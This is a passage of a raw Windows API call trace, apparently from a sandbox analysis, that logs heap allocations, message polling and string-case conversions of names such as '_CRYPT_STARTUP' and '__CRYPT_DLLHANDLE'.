wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0038.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0038.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0038.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0038.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.016] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0038.016] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.016] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.016] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.016] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.016] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.017] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.017] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.017] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.017] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.017] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.017] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0038.017] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.018] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.018] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.018] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xde21) returned 0x942e38 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x942e38 | out: hHeap=0x770000) returned 1 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.021] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 